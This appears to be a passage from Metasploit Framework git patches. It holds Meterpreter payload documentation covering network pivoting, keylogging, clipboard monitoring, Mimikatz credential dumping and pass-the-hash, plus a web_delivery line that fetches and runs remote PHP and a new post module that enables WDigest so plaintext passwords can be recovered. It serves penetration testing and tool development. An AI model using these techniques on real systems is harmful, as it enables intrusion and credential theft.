extension, please read this [wiki](https://github.com/rapid7/metasploit-framework/wiki/Python-Extension). + +**Network Pivoting** + +There are three mains ways that you can use for moving around inside a network: the route command +in the msf prompt, in the meterpreter prompt, and portfwd. + +The route command from the msf prompt allows you connect to hosts on a different network through +the compromised machine. You should be able to determine that by looking at the compromised +machine's ipconfig: + +``` +[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.201:49182) at 2016-03-04 20:35:31 -0600 + +meterpreter > ipconfig +... +Interface 10 +============ +Name : Intel(R) PRO/1000 MT Network Connection +Hardware MAC : 00:0c:29:86:4b:0d +MTU : 1472 +IPv4 Address : 192.168.1.201 +IPv4 Netmask : 255.255.255.0 +IPv6 Address : 2602:30a:2c51:e660::20 +IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff +IPv6 Address : 2602:30a:2c51:e660:44a:576e:3d2c:d765 +IPv6 Netmask : ffff:ffff:ffff:ffff:: +IPv6 Address : 2602:30a:2c51:e660:94be:567f:4fe7:5da7 +IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff +IPv6 Address : fe80::44a:576e:3d2c:d765 +IPv6 Netmask : ffff:ffff:ffff:ffff:: + +... + +Interface 26 +============ +Name : VPN +Hardware MAC : 00:00:00:00:00:00 +MTU : 1400 +IPv4 Address : 192.100.0.100 +IPv4 Netmask : 255.255.255.255 + +... +``` + +The above shows that we have a meterpreter connection to 192.168.1.201 - let's call this box A. +And then box A is connected to the 192.100.0.0/24 VPN network. We as an attacker aren't connected +to this network directly, but we can explore that network through box A. So here's what we do by +routing: + +At the msf prompt, do: + +``` +msf exploit(handler) > route add 192.100.0.0 255.255.255.0 1 +[*] Route added +``` + +Note: ```1``` means the session ID, the payload that is used as a gateway to talk to other machines. + +So right now, we have a connection established to the VPN, and we should be able to connect to +another machine from that network: + +``` +msf auxiliary(smb_version) > run + +[*] 192.100.0.101:445 - 192.100.0.101:445 is running Windows 2003 SP2 (build:3790) (name:SINN3R-QIXN9TA2) (domain:WORKGROUP) +[*] Scanned 1 of 1 hosts (100% complete) +[*] Auxiliary module execution completed +msf auxiliary(smb_version) > +``` + +Another neat trick using route is that you can also bypass the compromised host's firewall this +way. For example, if the host has HTTP open, but SMB blocked by the firewall. You can try to +compromise it via HTTP first, use the route command to talk to SMB, and then try to exploit SMB. + +The route command in meterpreter allows you change the routing table that is on the target machine. +The way it needs to be configured is similar to the route command in msf. + +The portfwd command allows you to talk to a remote service like it's local. For example, if you +are able to compromise a host via SMB, but not able to connect to the remote desktop service, then +you can do: + +``` +meterpreter > portfwd add –l 3389 –p 3389 –r > target host > +``` + +And that should allow you to connect to remote desktop this way on the attacker's box: + +``` +rdesktop 127.0.0.1 +``` + +**Meterpreter Paranoid Mode** + +The paranoid mode forces the handler to be strict about which meterpreter should be connecting to +it, hence the name "paranoid mode". + +To learn more about this feature, please [click here](https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Paranoid-Mode). + +**Meterpreter Reliable Network Communication** + +Exiting Metasploit using ```exit -y``` no longer terminates the payload session like it used to. +Instead, it will continue to run behind the scenes, attempting to connect back to Metasploit when +an appropriate handler is available. If you wish to exit the session, make sure to ```sessions -K``` first. + +To learn more about this feature, please [click here](https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Reliable-Network-Communication). + +**Meterpreter Sleep Control** + +The sleep mode allows the payload on the target machine to be quiet for awhile, mainly in order to +avoid suspicious active communication, also better efficiency. + +It is very simple to use. At the meterpreter prompt, simply do: + +``` +meterpreter > sleep 20 +``` + +And that will allow meterpreter to sleep 20 seconds, and will reconnect. + +To learn more about this feature, please [click here](https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Sleep-Control). + +**Meterpreter Stageless Mode** + +A stageless meterpreter allows a more economical way to deliver the payload, for cases where a +normal one would actually cost too much time and bandwidth in a penetration test. To learn more +about this, [click on this](https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Stageless-Mode) to read more. + +To use the stageless payload, use ```windows/meterpreter_reverse_tcp``` instead. + +**Meterpreter Timeout Control** + +The timeout control basically defines the life span of meterpreter. To configure, use the +```set_timeouts``` command: + +``` +meterpreter > set_timeouts +Usage: set_timeouts [options] + +Set the current timeout options. +Any or all of these can be set at once. + +OPTIONS: + + -c <opt> Comms timeout (seconds) + -h Help menu + -t <opt> Retry total time (seconds) + -w <opt> Retry wait time (seconds) + -x <opt> Expiration timout (seconds) +``` + +To see the current timeout configuration, you can use the ```get_timeouts``` command: + +``` +meterpreter > get_timeouts +Session Expiry : @ 2016-03-11 21:15:58 +Comm Timeout : 300 seconds +Retry Total Time: 3600 seconds +Retry Wait Time : 10 seconds +``` + +To learn more about timeout control, please [click here](https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Timeout-Control). + +**Meterpreter Transport Control** + +https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Transport-Control + +## Using the Post Exploitation API in IRB + +To enter IRB, at the meterpreter prompt, do like the following: + +``` +meterpreter > irb +[*] Starting IRB shell +[*] The 'client' variable holds the meterpreter client + +>> +``` + +**The client object** + +The client object in meterpreter's IRB allows you control, or retrieve information about the host. +For example, this demonstrates how to obtain the current privilege we're running the payload as: + +```ruby +>> client.sys.config.getuid +``` + +To explore the client object, there are a few tricks. For example, you can use the #inspect method +to inspect it: + +``` +>> client.inspect +``` + +You can use the #methods method to see what methods you can use: + +``` +>> client.methods +``` + +To find the source of the method, you can use the #source_location method. For example, say I want +to find the source code for the #getuid method: + +``` +>> client.sys.config.method(:getuid).source_location +=> ["/Users/user/rapid7/msf/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb", 32] +``` + +The first element of the array is the location of the file. The second element is the line number +of the method. + +**Using Railgun** + +Railgun allows you to use the remote machine's Windows API in Ruby. For example, to create a +MessageBox on the target machine, do: + +``` +>> client.railgun.user32.MessageBoxA(0, "hello, world", "hello", "MB_OK") +=> {"GetLastError"=>0, "ErrorMessage"=>"The operation completed successfully.", "return"=>1} +``` + +To learn more about using Railgun, please read this [wiki](https://github.com/rapid7/metasploit-framework/wiki/How-to-use-Railgun-for-Windows-post-exploitation). + From b1e9f44ca26072ba9594ef7d034e47283f220b2f Mon Sep 17 00:00:00 2001 From: Fakhri Zulkifli <d0lph1n98@yahoo.com> Date: Sun, 6 Mar 2016 03:23:37 +0800 Subject: [PATCH 483/686] IPv6 Neighbor Advertisement Enhancement http://seclists.org/nmap-dev/2011/q2/79 1. Shorten router advertisement payload lifetime. 2. Randomize address prefix. 3. Prevent from getting into default router list. --- .../ipv6_neighbor_router_advertisement.rb | 25 +++++++++++-------- 1 file changed, 14 insertions(+), 11 deletions(-) diff --git a/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb b/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb index 08e6967dfe..4b1d988dce 100644 --- a/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb +++ b/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb @@ -20,7 +20,7 @@ class Metasploit3 < Msf::Auxiliary the host portion of the IPv6 address. Use NDP host solicitation to determine if the IP address is valid' }, - 'Author' => 'wuntee', + 'Author' => 'wuntee, d0lph1n98', 'License' => MSF_LICENSE, 'References' => [ @@ -33,20 +33,22 @@ class Metasploit3 < Msf::Auxiliary OptInt.new('TIMEOUT_NEIGHBOR', [true, "Time (seconds) to listen for a solicitation response.", 1]) ], self.class) - register_advanced_options( - [ - OptString.new('PREFIX', [true, "Prefix that each host should get an IPv6 address from", - "2001:1234:DEAD:BEEF::"] - ) - ], self.class) - deregister_options('SNAPLEN', 'FILTER', 'RHOST', 'PCAPFILE') end + def generate_prefix() + max = 16 ** 4 + prefix = "2001::" + (0..2).each do + prefix << "%x::" % Random.rand(0..max) + end + return prefix + end + def listen_for_neighbor_solicitation(opts = {}) hosts = [] timeout = opts['TIMEOUT'] || datastore['TIMEOUT'] - prefix = opts['PREFIX'] || datastore['PREFIX'] + prefix = @prefix max_epoch = ::Time.now.to_i + timeout autoconf_prefix = IPAddr.new(prefix).to_string().slice(0..19) @@ -94,7 +96,7 @@ class Metasploit3 < Msf::Auxiliary smac = @smac shost = opts['SHOST'] || datastore['SHOST'] || ipv6_link_address lifetime = opts['LIFETIME'] || datastore['TIMEOUT'] - prefix = opts['PREFIX'] || datastore['PREFIX'] + prefix = @prefix plen = 64 dmac = "33:33:00:00:00:01" @@ -141,7 +143,7 @@ class Metasploit3 < Msf::Auxiliary checksum = 0 hop_limit = 0 flags = 0x08 - lifetime = 1800 + lifetime = 0 reachable = 0 retrans = 0 [type, code, checksum, hop_limit, flags, @@ -152,6 +154,7 @@ class Metasploit3 < Msf::Auxiliary # Start capture open_pcap({'FILTER' => "icmp6"}) + @prefix = generate_prefix() @netifaces = true if not netifaces_implemented? print_error("WARNING : Pcaprub is not uptodate, some functionality will not be available") From b82b1b0a4779b42acc4a7386925324dbc4a2c9ba Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Sat, 5 Mar 2016 15:14:05 -0600 Subject: [PATCH 484/686] Update windows/meterpreter/reverse_tcp doc --- .../windows/meterpreter/reverse_tcp.md | 189 ++++++++++++++++-- 1 file changed, 170 insertions(+), 19 deletions(-) diff --git a/documentation/modules/payload/windows/meterpreter/reverse_tcp.md b/documentation/modules/payload/windows/meterpreter/reverse_tcp.md index b9693cfb0f..49b6fab838 100644 --- a/documentation/modules/payload/windows/meterpreter/reverse_tcp.md +++ b/documentation/modules/payload/windows/meterpreter/reverse_tcp.md @@ -9,13 +9,17 @@ windows/meterpreter/reverse_tcp is also the default payload for all Windows expl ## Vulnerable Application -This meterpreter payload is suitable for the following environments: +--- + +This Meterpreter payload is suitable for the following environments: * Windows x64 * Windows x86 ## Verification Steps +--- + windows/meterpreter/reverse_tcp is typically used in two different ways. First, it is typically used as a payload for an exploit. Here's how to do that: @@ -39,6 +43,8 @@ as an executable: ## Important Basic Commands +--- + **pwd command** The ```pwd``` command allows you to see the current directory you're in on the remote target. @@ -179,7 +185,7 @@ Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Users\user\Desktop> ``` -To switch back to meterpreter, do [CTRL]+[Z] to background the channel. +To switch back to Meterpreter, do [CTRL]+[Z] to background the channel. **sysinfo command** @@ -199,7 +205,7 @@ meterpreter > **keyscan_start** -The ```keyscan_start`` command starts the keylogging feature on the remote machine. +The ```keyscan_start``` command starts the keylogging feature on the remote machine. **keyscan_dump** @@ -275,6 +281,8 @@ SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:e09fcdea29d93203c925b2056 ## Scenarios +--- + **Setting up for Testing** For testing purposes, if you're tired of manually generating a payload and starting a multi handler @@ -306,24 +314,161 @@ msf exploit(handler) > Next, go to your ~/.msf4/local directory, you should see meterpreter_reverse_tcp.exe in there. Upload that payload to your test box, execute it, and you should receive a connection. +**Using a Post Module** -**Antivirus Evasion** +One of the best things about using Meterpreter is you have access to a variety of post exploitation +modules, specifically the multi and Windows categories. Post modules provide more abilities to +control of collect data from the remote machine automatically. For example: stealing passwords +from popular applications, enumerate or modify system settings, etc. + +To use a post module from the Meterpreter prompt. Simply use the ```run``` command, like so: + +``` +meterpreter > run post/windows/gather/checkvm + +[*] Checking if WIN-6NH0Q8CJQVM is a Virtual Machine ..... +[*] This is a VMware Virtual Machine +meterpreter > +``` + +It is also possible to run a post module via multiple Meterpreter sessions. To learn how, load +the specific post module you wish to run, and enter ```info -d``` to see the basic usage in the +documentation. -.. **Using the Mimikatz Extension** -.. +[Mimikatz](https://github.com/gentilkiwi/mimikatz) is a well known tool to extract passwords, hashes, PIN code, and kerberos tickets from +memory on Windows. This might actually be the first thing you want to use as soon as you get a +high-privileged session (such as SYSTEM). + +To begin, load the extension: + +``` +meterpreter > load mimikatz +Loading extension mimikatz...success. +meterpreter > +``` + +This will create more commands for the Meterpreter prompt, most of them are meant to be used to +retrieve user names/hashes/passwords and other information: + +``` +Mimikatz Commands +================= + + Command Description + ------- ----------- + kerberos Attempt to retrieve kerberos creds + livessp Attempt to retrieve livessp creds + mimikatz_command Run a custom command + msv Attempt to retrieve msv creds (hashes) + ssp Attempt to retrieve ssp creds + tspkg Attempt to retrieve tspkg creds + wdigest Attempt to retrieve wdigest creds +``` + +An example of using ```msv```: + +``` +meterpreter > msv +[+] Running as SYSTEM +[*] Retrieving msv credentials +msv credentials +=============== + +AuthID Package Domain User Password +------ ------- ------ ---- -------- +0;313876 NTLM WIN-6NH0Q8CJQVM user10 lm{ 0363cb92c563245c447eaf70cfac29c1 }, ntlm{ 16597a07ce66307b3e1a5bd1b7abe123 } +0;313828 NTLM WIN-6NH0Q8CJQVM user10 lm{ 0363cb92c563245c447eaf70cfac29c1 }, ntlm{ 16597a07ce66307b3e1a5bd1b7abe123 } +0;996 Negotiate WORKGROUP WIN-6NH0Q8CJQVM$ n.s. (Credentials KO) +0;997 Negotiate NT AUTHORITY LOCAL SERVICE n.s. (Credentials KO) +0;45518 NTLM n.s. (Credentials KO) +0;999 NTLM WORKGROUP WIN-6NH0Q8CJQVM$ n.s. (Credentials KO) +``` + **Using the extapi Extension** -.. +The main purpose of the extapi extension is for advanced enumeration of the target machine. For +example: registered services, open windows, clipboard, ADSI, WMI queries, etc. + +To begin, at the Meterpreter prompt, do: + +``` +meterpreter > load extapi +Loading extension extapi...success. +meterpreter > +``` + +One great feature of the extension is clipboard management. The Windows clipboard is interesting, +because it can store anything sensitive: files, user names, passwords, etc, but not well protected. + +For example: A password manager is a popular tool to store passwords encrypted. It allows the user +to create complex passwords without the need to memorize any of them. All the user needs to do is +open the password manager, retrieve the password for a particular account by copying it, and then +paste it on a login page. + +There is a security problem to the above process. When the user copies the password, it is stored +in the operating system's clipboard. As an attacker, you can take advantage of this by starting the +clipboard monitor from Meterpreter/extapi, and then collect whatever the user copies. + +To read whatever is currently stored in the target's clipboard, you can use the clipboard_get_data +commnad: + +``` +meterpreter > clipboard_get_data +Text captured at 2016-03-05 19:13:39.0170 +========================================= +hello, world!! +========================================= + +meterpreter > +``` + +The limitation of this command is that since you're only grabbing whatever is in the clipboard at +the time, there is only one item to collect. However, when you start a monitor, you can collect +whatever goes in there. To start, issue the following command: + +``` +meterpreter > clipboard_monitor_start +[+] Clipboard monitor started +meterpreter > +``` + +While it is monitoring, you can ask Meterpreter to dump whatever's been captured. + +``` +meterpreter > clipboard_monitor_dump +Text captured at 2016-03-05 19:18:18.0466 +========================================= +this is fun. +========================================= + +Files captured at 2016-03-05 19:20:07.0525 +========================================== +Remote Path : C:\Users\user\Desktop\cat_pic.png +File size : 37627 bytes +downloading : C:\Users\user\Desktop\cat_pic.png -> ./cat_pic.png +download : C:\Users\user\Desktop\cat_pic.png -> ./cat_pic.png + +========================================== + +[+] Clipboard monitor dumped +meterpreter > +``` + +The ```clipboard_monitor_stop``` command will also dump the captured data, and then exit. + +Combined with Meterpreter's keylogger, you have a very effective setup to capture the user's +inputs. + **Using the Python Extension** The Python extension allows you to use the remote machine's Python interpreter. -To load the extension, at the meterpreter prompt, do: +To load the extension, at the Meterpreter prompt, do: ``` meterpreter > use python @@ -370,7 +515,7 @@ To learn more about the Python extension, please read this [wiki](https://github **Network Pivoting** There are three mains ways that you can use for moving around inside a network: the route command -in the msf prompt, in the meterpreter prompt, and portfwd. +in the msf prompt, in the Meterpreter prompt, and portfwd. The route command from the msf prompt allows you connect to hosts on a different network through the compromised machine. You should be able to determine that by looking at the compromised @@ -410,7 +555,7 @@ IPv4 Netmask : 255.255.255.255 ... ``` -The above shows that we have a meterpreter connection to 192.168.1.201 - let's call this box A. +The above shows that we have a Meterpreter connection to 192.168.1.201 - let's call this box A. And then box A is connected to the 192.100.0.0/24 VPN network. We as an attacker aren't connected to this network directly, but we can explore that network through box A. So here's what we do by routing: @@ -440,7 +585,7 @@ Another neat trick using route is that you can also bypass the compromised host' way. For example, if the host has HTTP open, but SMB blocked by the firewall. You can try to compromise it via HTTP first, use the route command to talk to SMB, and then try to exploit SMB. -The route command in meterpreter allows you change the routing table that is on the target machine. +The route command in Meterpreter allows you change the routing table that is on the target machine. The way it needs to be configured is similar to the route command in msf. The portfwd command allows you to talk to a remote service like it's local. For example, if you @@ -459,7 +604,7 @@ rdesktop 127.0.0.1 **Meterpreter Paranoid Mode** -The paranoid mode forces the handler to be strict about which meterpreter should be connecting to +The paranoid mode forces the handler to be strict about which Meterpreter should be connecting to it, hence the name "paranoid mode". To learn more about this feature, please [click here](https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Paranoid-Mode). @@ -477,19 +622,19 @@ To learn more about this feature, please [click here](https://github.com/rapid7/ The sleep mode allows the payload on the target machine to be quiet for awhile, mainly in order to avoid suspicious active communication, also better efficiency. -It is very simple to use. At the meterpreter prompt, simply do: +It is very simple to use. At the Meterpreter prompt, simply do: ``` meterpreter > sleep 20 ``` -And that will allow meterpreter to sleep 20 seconds, and will reconnect. +And that will allow Meterpreter to sleep 20 seconds, and will reconnect. To learn more about this feature, please [click here](https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Sleep-Control). **Meterpreter Stageless Mode** -A stageless meterpreter allows a more economical way to deliver the payload, for cases where a +A stageless Meterpreter allows a more economical way to deliver the payload, for cases where a normal one would actually cost too much time and bandwidth in a penetration test. To learn more about this, [click on this](https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Stageless-Mode) to read more. @@ -497,7 +642,7 @@ To use the stageless payload, use ```windows/meterpreter_reverse_tcp``` instead. **Meterpreter Timeout Control** -The timeout control basically defines the life span of meterpreter. To configure, use the +The timeout control basically defines the life span of Meterpreter. To configure, use the ```set_timeouts``` command: ``` @@ -530,11 +675,17 @@ To learn more about timeout control, please [click here](https://github.com/rapi **Meterpreter Transport Control** -https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Transport-Control +Transport Control allows you manage transports on the fly while the payload session is still +running. Meterpreter can automatically cycle through the transports when communication fails, +or you can do so manually. + +To learn more about this, please read this [documentation](https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Transport-Control). ## Using the Post Exploitation API in IRB -To enter IRB, at the meterpreter prompt, do like the following: +--- + +To enter IRB, at the Meterpreter prompt, do like the following: ``` meterpreter > irb @@ -546,7 +697,7 @@ meterpreter > irb **The client object** -The client object in meterpreter's IRB allows you control, or retrieve information about the host. +The client object in Meterpreter's IRB allows you control, or retrieve information about the host. For example, this demonstrates how to obtain the current privilege we're running the payload as: ```ruby From 03eb568af72d3b55977ba0201bc14ec564ad4c6d Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Sat, 5 Mar 2016 15:17:19 -0600 Subject: [PATCH 485/686] Add --- to make sections to stand out more --- data/markdown_doc/module_doc_template.md | 10 +++++++++- .../modules/auxiliary/scanner/smb/smb_login.md | 6 ++++++ .../modules/auxiliary/server/browser_autopwn2.md | 10 ++++++++++ .../modules/exploit/multi/script/web_delivery.md | 6 ++++++ .../modules/exploit/windows/smb/ms08_067_netapi.md | 8 ++++++++ documentation/modules/exploit/windows/smb/psexec.md | 8 ++++++++ 6 files changed, 47 insertions(+), 1 deletion(-) diff --git a/data/markdown_doc/module_doc_template.md b/data/markdown_doc/module_doc_template.md index acc95041fd..ebaafa6e96 100644 --- a/data/markdown_doc/module_doc_template.md +++ b/data/markdown_doc/module_doc_template.md @@ -4,10 +4,14 @@ But feel free to add more content/sections to this. ## Vulnerable Application +--- + Instructions to get the vulnerable application. ## Verification Steps +--- + Example steps in this format: 1. Install the application @@ -18,13 +22,17 @@ But feel free to add more content/sections to this. ## Options +--- + **Option name** Talk about what it does, and how to use it appropriately. ## Scenarios - Specific demo of using the module: +--- + + Specific demo of using the module that might be useful in a real world scenario. ``` code or console output diff --git a/documentation/modules/auxiliary/scanner/smb/smb_login.md b/documentation/modules/auxiliary/scanner/smb/smb_login.md index e0e9391b68..21ec74f4de 100644 --- a/documentation/modules/auxiliary/scanner/smb/smb_login.md +++ b/documentation/modules/auxiliary/scanner/smb/smb_login.md @@ -4,10 +4,14 @@ and log into more machines. ## Vulnerable Application +--- + To use smb_login, make sure you are able to connect to a SMB service that supports SMBv1. ## Verification Steps +--- + The following demonstrates a basic scenario of using the [built-in wordlists](https://github.com/rapid7/metasploit-framework/tree/master/data/wordlists) to brute-force SMB: ``` @@ -42,6 +46,8 @@ msf auxiliary(smb_login) ## Options +--- + By default, the smb_login module only requires the RHOSTS option to run. But in reality, you will also need to supply user names and passwords. The following options are available to support different credential formats: diff --git a/documentation/modules/auxiliary/server/browser_autopwn2.md b/documentation/modules/auxiliary/server/browser_autopwn2.md index c09b71ff47..477d87da29 100644 --- a/documentation/modules/auxiliary/server/browser_autopwn2.md +++ b/documentation/modules/auxiliary/server/browser_autopwn2.md @@ -3,6 +3,8 @@ feel different for you. Here are the features you should know about before using ## Vulnerable Applications +--- + Browser Autopwn 2 is capable of targeting popular browsers and 3rd party plugins, such as: * Internet Explorer @@ -14,6 +16,8 @@ Browser Autopwn 2 is capable of targeting popular browsers and 3rd party plugins ## Exploit URLs +--- + Normally, the only URL you need to care about is the **BrowserAutoPwn URL**. This is the URL you should send to the targets you wish to attack. @@ -29,6 +33,8 @@ used, including the URLs. ## Browser Autopwn 2 Options +--- + **The HTMLContent Option** The HTMLContent option allows you to serve a basic HTML web page to the browser instead of having a @@ -137,6 +143,8 @@ set ExploitReloadTimeout 5000 ## Scenarios +--- + By default, Browser Autopwn 2 goes through the entire exploit module tree, and will try to use different types of exploits - Firefox, Internet Explorer, Adobe Flash, Android, etc. If you want to test a specific application, basically all you need to do is setting the @@ -158,6 +166,8 @@ $ ./msfconsole -q -r scripts/resource/bap_flash_only.rc ## Logging +--- + In addition, when a browser connects to BAP, this link-clicking event is also logged to the database as a "bap.clicks" note type. If the ShowExploitList option is set to true, that will also save the exploit list information so that after testing you can go back to the database and see diff --git a/documentation/modules/exploit/multi/script/web_delivery.md b/documentation/modules/exploit/multi/script/web_delivery.md index f5208585ee..b36879b5d9 100644 --- a/documentation/modules/exploit/multi/script/web_delivery.md +++ b/documentation/modules/exploit/multi/script/web_delivery.md @@ -11,6 +11,8 @@ say the target supports Powershell. ## Verification Steps +--- + To be able to use web_delivery, you must gain access to the target machine first, with the ability to execute either the Python, or PHP, or Powershell interpreter. @@ -44,6 +46,8 @@ php -d allow_url_fopen=true -r "eval(file_get_contents('http://172.16.23.1:8080/ ## Targets +--- + **Python** Python is a fairly popular language, especially on unix-based systems. For example, it comes with @@ -61,6 +65,8 @@ don't come with it by default, but it is still possible to see it installed on a ## Scenarios +--- + **Against a compromised web application** web_delivery would work nicely for a web application with a command execution vulnerability. diff --git a/documentation/modules/exploit/windows/smb/ms08_067_netapi.md b/documentation/modules/exploit/windows/smb/ms08_067_netapi.md index 6af5b746ad..14c1e4efef 100644 --- a/documentation/modules/exploit/windows/smb/ms08_067_netapi.md +++ b/documentation/modules/exploit/windows/smb/ms08_067_netapi.md @@ -9,6 +9,8 @@ vulnerable code path, not just passively. ## Vulnerable Application +--- + This exploit works against a vulnerable SMB service from one of these Windows systems: * Windows 2000 @@ -20,14 +22,20 @@ the system's patch level, or use a vulnerability check. ## Verification Steps +--- + Please see Basic Usage under Overview. ## Options +--- + Please see Required Options under Overview. ## Scenarios +--- + **Failure to detect the language pack** On some Windows systems, ms08_067_netapi (as well as other SMB modules) might show you this diff --git a/documentation/modules/exploit/windows/smb/psexec.md b/documentation/modules/exploit/windows/smb/psexec.md index 5fe2abe0c5..ba096f6330 100644 --- a/documentation/modules/exploit/windows/smb/psexec.md +++ b/documentation/modules/exploit/windows/smb/psexec.md @@ -9,6 +9,8 @@ you normally would with any Metasploit exploits. ## Vulnerable Application +--- + To be able to use exploit/windows/smb/psexec, you must meet these requirements: 1. You have a valid username/password. @@ -18,6 +20,8 @@ To be able to use exploit/windows/smb/psexec, you must meet these requirements: ## Verification Steps +--- + At the minimum, you should be able use psexec to get a session with a valid credential: ``` @@ -46,6 +50,8 @@ meterpreter > ## Options +--- + By default, exploit/windows/smb/psexec can be as simple as setting the RHOST option, and ready to go. But in reality, you will probably need to at least configure: @@ -59,6 +65,8 @@ This can be either the plain text version, or the Windows hash. ## Scenarios +--- + **Pass the Hash** From 027315eeaa1c2f3b3c5a7bc9433dcae3c4d4a0c7 Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Sat, 5 Mar 2016 20:33:40 -0600 Subject: [PATCH 486/686] Update post_demo_template --- data/markdown_doc/post_demo_template.erb | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/data/markdown_doc/post_demo_template.erb b/data/markdown_doc/post_demo_template.erb index 20239bbfe6..94fe5685fe 100644 --- a/data/markdown_doc/post_demo_template.erb +++ b/data/markdown_doc/post_demo_template.erb @@ -1,12 +1,16 @@ There are two ways to execute this post module. -The first is by using the "run" command at the meterpreter prompt. It allows you to run the post +**From the Meterpreter prompt** + +The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session: ``` meterpreter > run <%= mod.fullname %> ``` +**From the msf prompt** + The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command. From 0e52fda708723f5a50b1255da2ee0a544230c36a Mon Sep 17 00:00:00 2001 From: Meatballs <eat_meatballs@hotmail.co.uk> Date: Fri, 25 Sep 2015 17:02:15 +0100 Subject: [PATCH 487/686] Initial tidy --- modules/post/windows/manage/enable_wdigest.rb | 65 +++++++++++++++++++ 1 file changed, 65 insertions(+) create mode 100644 modules/post/windows/manage/enable_wdigest.rb diff --git a/modules/post/windows/manage/enable_wdigest.rb b/modules/post/windows/manage/enable_wdigest.rb new file mode 100644 index 0000000000..068bd93a4d --- /dev/null +++ b/modules/post/windows/manage/enable_wdigest.rb @@ -0,0 +1,65 @@ +require 'msf/core' +require 'rex' +require 'msf/core/auxiliary/report' + +class Metasploit3 < Msf::Post + include Msf::Post::Windows::Priv + include Msf::Post::Windows::Registry + include Msf::Post::Windows::Accounts + include Msf::Auxiliary::Report + + WDIGEST_REG_LOCATION = 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest' + USE_LOGON_CREDENTIAL = 'UseLogonCredential' + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Windows Post Manage Enable WDigest Credential Caching', + 'Description' => %q{ + On Windows 8/2012 or higher, the Digest Security Provider (WDIGEST) is disabled by default. This module enables + credential caching by adding/changing the value of the UseLogonCredential DWORD under WDIGEST provider's Registry key. + Any subsequest logins will allow mimikatz to recover the plain text passwords from the system's memory. + }, + 'License' => MSF_LICENSE, + 'Author' => [ 'Kostas Lintovois <kostas.lintovois[at]mwrinfosecurity.com>'], + 'Platform' => [ 'win' ], + 'SessionTypes' => [ 'meterpreter' ] + )) + end + + # Run Method for when run command is issued + def run + print_status("Running module against #{sysinfo['Computer']}") + # Check if OS is 8/2012 or newer. If not, no need to set the registry key + if sysinfo['OS'] =~ /Windows (8|2012)/i + wdigest_enable + else + print_status('Older Windows version detected. No need to enable the WDigest Security Provider. Exiting...') + end + end + + def wdigest_enable + # Check if the key exists. Not present by default + print_status("Checking if the #{WDIGEST_REG_LOCATION}\\UseLogonCredential DWORD exists...") + begin + wdvalue = registry_getvaldata(WDIGEST_REG_LOCATION, USE_LOGON_CREDENTIAL) + key_exists = !wdvalue.nil? + + print_status("UseLogonCredential is set to #{wdvalue}") + + # If it is not present, create it + if key_exists && wdvalue == 1 + print_good('Registry value is already set. WDigest Security Provider is enabled') + else + verb = key_exists ? 'Setting' : 'Creating' + print_status("#{verb} UseLogonCredential DWORD value as 1...") + if registry_setvaldata(WDIGEST_REG_LOCATION, USE_LOGON_CREDENTIAL, 1, 'REG_DWORD') + print_good('WDigest Security Provider enabled') + else + print_error('Unable to access registry key - insufficient privileges?') + end + end + rescue Rex::Post::Meterpreter::RequestError => e + fail_with(Failure::Unknown, "Unable to access registry key: #{e}") + end + end +end From 6b510005da62c2c4b3d369620361616239a4050c Mon Sep 17 00:00:00 2001 From: Meatballs <eat_meatballs@hotmail.co.uk> Date: Wed, 30 Sep 2015 13:47:02 +0100 Subject: [PATCH 488/686] Reverse os checks --- modules/post/windows/manage/enable_wdigest.rb | 13 +++++++------ 1 file changed, 7 insertions(+), 6 deletions(-) diff --git a/modules/post/windows/manage/enable_wdigest.rb b/modules/post/windows/manage/enable_wdigest.rb index 068bd93a4d..283ee5eb02 100644 --- a/modules/post/windows/manage/enable_wdigest.rb +++ b/modules/post/windows/manage/enable_wdigest.rb @@ -30,28 +30,29 @@ class Metasploit3 < Msf::Post def run print_status("Running module against #{sysinfo['Computer']}") # Check if OS is 8/2012 or newer. If not, no need to set the registry key - if sysinfo['OS'] =~ /Windows (8|2012)/i - wdigest_enable - else + # Can be backported to Windows 7, 2k8R2 but defaults to enabled... + if sysinfo['OS'] =~ /Windows (XP|Vista|200[03])/i print_status('Older Windows version detected. No need to enable the WDigest Security Provider. Exiting...') + else + wdigest_enable end end def wdigest_enable # Check if the key exists. Not present by default - print_status("Checking if the #{WDIGEST_REG_LOCATION}\\UseLogonCredential DWORD exists...") + print_status("Checking if the #{WDIGEST_REG_LOCATION}\\#{USE_LOGON_CREDENTIAL} DWORD exists...") begin wdvalue = registry_getvaldata(WDIGEST_REG_LOCATION, USE_LOGON_CREDENTIAL) key_exists = !wdvalue.nil? - print_status("UseLogonCredential is set to #{wdvalue}") + print_status("#{USE_LOGON_CREDENTIAL} is set to #{wdvalue}") if key_exists # If it is not present, create it if key_exists && wdvalue == 1 print_good('Registry value is already set. WDigest Security Provider is enabled') else verb = key_exists ? 'Setting' : 'Creating' - 